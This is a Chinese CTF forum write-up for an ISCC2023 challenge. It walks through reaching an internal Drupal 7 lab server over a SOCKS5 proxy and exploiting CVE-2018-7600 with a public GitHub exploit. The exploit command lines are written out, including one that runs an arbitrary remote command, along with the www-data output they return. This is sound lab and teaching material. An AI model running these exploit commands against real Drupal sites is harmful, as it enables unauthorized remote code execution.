设为首页
收藏本站
只需一步,快速开始
首页
Portal
论坛
BBS
问答
CTF社群
Group
CTF平台
每日签到
青少年CTF论坛
»
论坛
›
CTF
›
其他
›
查看内容
0 评论
0 收藏
分享
【ISCC2023】阶段一|内网服务器漏洞利用(CVE-2018-7600)
Moxin
发布于 2023-7-13 22:11:24
阅读 1083
查看全部
来自
河南商丘
前些日子比赛结束了,还是有很多小伙伴想要我们这次解题的部分WP,我们这次给大家分享一下实战题的解题思路,其中遇到的一些小坑也是其中代理的问题,解决完成之后一切都好说了。 # 审题 ![](https://docs.qsnctf.com/img/【ISCC2023】阶段一|内网服务器漏洞利用/image-20230503030200805.png) 我们首先需要使用Windows系统操作,因为系统并没有给我们提供MacOS和Linux环境的相关程序(当然,你也可以找)。 # 注意事项 设置连接后,然后访问Server1,这个时候会可能有些问题,比如你有代理插件,设置**“无代理”**会出现无法访问的情况。 ![](https://docs.qsnctf.com/img/【ISCC2023】阶段一|内网服务器漏洞利用/image-20230503030336090.png) 我们这时候需要设置一个系统代理,为什么呢? ![image-20230503031806588](https://docs.qsnctf.com/img/【ISCC2023】阶段一|内网服务器漏洞利用/image-20230503031806588.png) 因为这个环境很坑的帮我们设置了一个Socks5代理,如果你没有发现这个问题可能都不会知道有这个代理。(hha,大家看到这篇文章的时候可能已经不需要这个环境啦!) 我们访问这个脚本地址,拿到脚本: ```vbscript var myproxy = "SOCKS5 127.0.0.1:1080; " var subNet = ["10.119.4.206", "172.18.0.2"] var subMask = ["255.255.255.255", "255.255.255.255"] var direct = 'DIRECT;'; function alert_eval(str) { alert(str + ' is ' + eval(str)) } function FindProxyForURL(url, host) { for (let index=0; index < subNet.length; index++) { if(isInNet(host, subNet[index], subMask[index])) { return myproxy; } } return direct; } ``` **其中表明:你设置了一个Socks5的代理,代理IP地址为127.0.0.1:1080** # 信息收集 访问172.18.0.2(靶机内网IP) ![image-20230503031826301](https://docs.qsnctf.com/img/【ISCC2023】阶段一|内网服务器漏洞利用/image-20230503031826301.png) 我们发现访问到了一个Drupal 7的环境,这个环境最容易出现的漏洞(影响较大的漏洞)我们使用最最最笨的办法: ![](https://docs.qsnctf.com/img/【ISCC2023】阶段一|内网服务器漏洞利用/image-20230503031133137.png) 也就是`CVE-2018-7602`和`CVE-2018-7600`,这两个漏洞都都是远程代码执行。 我们使用Msf看一下这个漏洞的信息 ![](https://docs.qsnctf.com/img/【ISCC2023】阶段一|内网服务器漏洞利用/image-20230503032022535.png) ![](https://docs.qsnctf.com/img/【ISCC2023】阶段一|内网服务器漏洞利用/image-20230503032046476.png) 得到了一个比较广的范围,那么我们其实可以直接实验了,没有必要再追究版本问题了。 # 漏洞利用 Github找个exp:https://github.com/pimps/CVE-2018-7600 ![](https://docs.qsnctf.com/img/【ISCC2023】阶段一|内网服务器漏洞利用/image-20230503032414269.png) 首先安装requests、bs4(我相信大家都装了) ```powershell python ./drupa7-CVE-2018-7600.py -p socks5://127.0.0.1:1080 http://172.18.0.2/ ``` 执行命令,应该能拿到 uid=33(www-data) gid=33(www-data) groups=33(www-data) 如果上一步成功了,则下面就可以执行命令了,如果没有成功,那可能是环境问题或者是你的代理问题。 ````powershell ./drupa7-CVE-2018-7600.py -c "pidof VehicleController" -p socks5://127.0.0.1:1080 http://172.18.0.2/ ```` 使用上面的命令就能拿到进程号 ![](https://docs.qsnctf.com/img/【ISCC2023】阶段一|内网服务器漏洞利用/image-20230503033731139.png) 当然,我们也可以用msf一把梭,这样也可以哦。 环境已经复现到平台,可以直接在平台中练习。 ![](https://docs.qsnctf.com/img/【ISCC2023】阶段一|内网服务器漏洞利用(CVE-2018-7600)/image-20230503045331915.png) ![](https://docs.qsnctf.com/img/【ISCC2023】阶段一|内网服务器漏洞利用(CVE-2018-7600)/image-20230503045248311.png) # 备注 备注:本篇文章在比赛结束后进行解密,供大家查看。文章发布于5月3日,在比赛结束之前一直是以加密方式保存,没有进行泄露。解密日期:2023年05月29日。
回复
举报
使用道具
分享
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
上一篇:
如何解决7z2john的Lzma问题?
下一篇:
取证-SSH-04
全部回复
暂无回帖,快来参与回复吧
返回列表
发新帖
本版积分规则
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
Moxin
管理员
主题
51
回复
30
粉丝
0
加好友
发私信
热点排行
1
题目:再签到一次
2
【新平台】回复换FLAG啦!
3
【活动】你知道小光的答案吗?
4
【活动】小光的答案之书
5
LiHua's checkme WP
6
入门需要怎么做?
7
取证-SSH-04
8
misc中怎么分辨各工具加密后的数据
9
sqlmap连接不到目标RUL
10
因为是一个小白,有一道题不会 请各位大佬 出手帮一下 misc的
快速回复
返回顶部
返回列表